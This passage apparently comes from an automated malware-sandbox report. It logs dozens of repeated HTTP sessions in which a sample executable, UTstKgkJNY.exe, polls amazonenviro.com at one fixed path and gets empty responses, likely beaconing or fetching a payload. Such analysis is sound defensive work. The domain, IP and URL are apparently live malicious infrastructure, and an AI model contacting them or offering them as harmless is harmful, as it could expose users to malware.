              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.1049967166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:42 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:43 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:43 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.1049980166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:44 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:44 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:44 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.1049991166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:45 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:46 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:46 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.1050004166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:47 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:48 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:47 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.1050018166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:49 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:49 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:49 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.1050028166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:50 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:51 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:51 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.1050034166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:52 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:52 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:52 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.1050036166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:53 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:54 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:54 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.1050039166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:55 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:56 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:56 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.1050041166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:57 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:57 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:57 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.1050043166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:25:58 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:25:59 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:25:59 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.1050045166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:00 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:01 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:01 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.1050047166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:02 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:02 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:02 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.1050049166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:03 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:04 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:04 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.1050051166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:05 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:06 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:05 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.1050053166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:07 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:07 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:07 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.1050055166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:08 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:09 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:09 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.1050057166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:10 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:10 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:10 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.1050059166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:11 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:12 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:12 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.1050061166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:13 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:14 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:13 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.1050063166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:15 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:15 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:15 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.1050065166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:16 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:17 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:17 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.1050067166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:18 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:18 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:18 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.1050069166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:19 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:20 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:20 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.1050071166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:21 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:22 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:21 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.1050073166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:23 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:23 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:23 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.1050075166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:24 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:25 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:25 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.1050077166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:26 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:26 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:26 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.1050079166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:28 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:28 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:28 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              53192.168.2.1050081166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:29 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:30 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:30 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              54192.168.2.1050083166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:31 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:31 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:31 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.1050085166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:32 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:33 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:33 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.1050087166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:34 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:35 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:34 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.1050089166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:36 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:36 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:36 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.1050091166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:37 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:38 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:38 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.1050093166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:39 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:39 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:39 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              60192.168.2.1050095166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:40 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:41 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:41 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              61192.168.2.1050097166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:42 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:43 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:42 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              62192.168.2.1050099166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:44 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:44 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:44 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              63192.168.2.1050101166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:45 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
